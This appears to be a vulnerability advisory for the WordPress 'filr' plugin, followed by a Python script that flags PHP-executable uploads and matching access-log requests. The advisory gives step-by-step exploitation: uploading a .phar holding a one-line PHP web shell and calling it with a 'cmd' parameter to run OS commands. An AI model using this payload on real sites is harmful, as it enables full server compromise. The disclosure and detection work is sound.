Description
The plugin is affected by a Remote Code Execution (RCE) vulnerability that allows a user with Author-level privileges to execute operating system commands and fully compromise the server.
1) Go to the plugin's main dashboard: http://your_site/wordpress/wp-admin/edit.php?post_type=filr
2) Add new File
3) Upload a file with the extension "phar" and malicious code inside, like <?php system($_GET['cmd']); ?>
4) Go to http://your_site/wordpress/wp-content/uploads/filr/{number_of_post}/cmd.phar?cmd=ps+aux (or pwd or id) to achieve RCE
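
A defender-side check for the issue described above, added here as an example that is not part of the original advisory or the plugin's own code: it lists files with PHP-executable extensions under the filr uploads directory and flags access-log requests that fetch them. The extension list, the function names and the sample log lines are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Extensions commonly mapped to the PHP handler (assumption: adjust to the server's config).
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar"}

# Request part of a combined-format access-log line: "GET /path?query HTTP/1.1"
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Upload location from the advisory: /wp-content/uploads/filr/{number_of_post}/{file}
UPLOAD_RE = re.compile(r"/wp-content/uploads/filr/\d+/[^/?]+\.(\w+)$", re.I)


def find_executable_uploads(root):
    """Return sorted relative paths under root whose extension is PHP-executable."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext in EXEC_EXTS:
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)


def suspicious_requests(log_lines):
    """Return request targets that fetch a PHP-executable file from the filr uploads tree."""
    hits = []
    for line in log_lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        path = m.group(1).split("?", 1)[0]  # judge the file name, not the query string
        um = UPLOAD_RE.search(path)
        if um and um.group(1).lower() in EXEC_EXTS:
            hits.append(m.group(1))
    return hits


# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wordpress/wp-content/uploads/filr/42/report.pdf HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /wordpress/wp-content/uploads/filr/43/cmd.phar?cmd=id HTTP/1.1" 200 54',
]

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:  # constructed uploads tree
        for rel in ("42/report.pdf", "43/cmd.phar"):
            os.makedirs(os.path.join(root, os.path.dirname(rel)), exist_ok=True)
            open(os.path.join(root, rel), "w").close()
        print(find_executable_uploads(root))
    print(suspicious_requests(SAMPLE_LOG))
```

On a real server, point find_executable_uploads at the site's wp-content/uploads/filr directory and feed suspicious_requests the web server's access log.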